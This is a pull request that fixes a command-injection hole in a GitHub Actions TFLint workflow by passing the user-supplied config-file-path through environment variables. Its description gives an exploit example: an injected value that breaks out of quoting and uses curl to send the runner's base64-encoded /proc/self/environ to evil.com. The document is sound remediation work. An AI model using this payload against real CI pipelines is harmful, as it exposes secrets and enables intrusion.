### PR TITLE
Defang user controlled fields with safe handling to remediate command injection

### DIFF
--- a/.github/workflows/terraform-lint.yml
+++ b/.github/workflows/terraform-lint.yml
@@ -55,11 +55,12 @@ jobs:
 
       - name: Run TFLint
         if: steps.check_files.outputs.result == 'true'
+        env:
+          CONFIG_FILE_PATH: ${{ github.event.inputs.config-file-path }}
+          WORKSPACE: ${{ github.workspace }}
         run: |
-          if [ -n "${{ github.event.inputs.config-file-path }}" ]; then
-            tflint --recursive --config \
-            "${{ github.workspace }}/
-            ${{ github.event.inputs.config-file-path }}"
+          if [ -n "$CONFIG_FILE_PATH" ]; then
+            tflint --recursive --config "$WORKSPACE/$CONFIG_FILE_PATH"
           else
-            tflint --recursive --config "${{ github.workspace }}/cedille-workflows/.tflint.hcl"
+            tflint --recursive --config "$WORKSPACE/cedille-workflows/.tflint.hcl"
           fi


### PR DESCRIPTION
The config-file field is user-controlled and can be used for command injection, executing arbitrary code that's not in this workflow.

## Exploit Example

An attacker calling this workflow could provide the following value for config-file-path:

`.tflint.hcl"; curl https://evil.com/exfiltrate?data=$(cat /proc/self/environ | base64) && echo "` 

This would result in the shell executing this inside of the `if` condition:

```
tflint --recursive --config \
"$GITHUB_WORKSPACE/
.tflint.hcl"; curl https://evil.com/exfiltrate?data=$(cat /proc/self/environ | base64) && echo ""
```